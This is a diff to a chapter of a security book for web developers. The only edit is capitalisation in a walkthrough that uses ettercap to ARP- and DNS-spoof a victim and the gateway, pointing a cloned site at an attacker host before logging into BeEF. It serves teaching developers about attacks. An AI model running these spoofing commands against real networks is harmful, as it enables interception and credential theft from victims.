binarymist/HolisticInfoSec-For-WebDevelopers-Fascicle1/manuscript/markdown/main/chapter8.md

 G>
 G> Add an 'A' record of the website you ave just cloned and want to spoof into ettercaps dns file: `echo "<domainname-you-want-to-clone.com> A <IP address that is hosting the clone>" >> /etc/ettercap/etter.dns`
 G>
-G> Now run ettercap which is going to both ARP and DNS spoof your victim and the victims gateway with the MITM option, using dns_spoof plugin: `ettercap -M arp:remote -P dns_spoof -q -T /<gateway IP address>/ /<victim IP address>/`.
+G> Now run ettercap which is going to both ARP and DNS spoof your victim and the victims gateway with the MItM option, using dns_spoof plugin: `ettercap -M arp:remote -P dns_spoof -q -T /<gateway IP address>/ /<victim IP address>/`.
 G>
 G> You can now log into the BeEF web UI.
 G>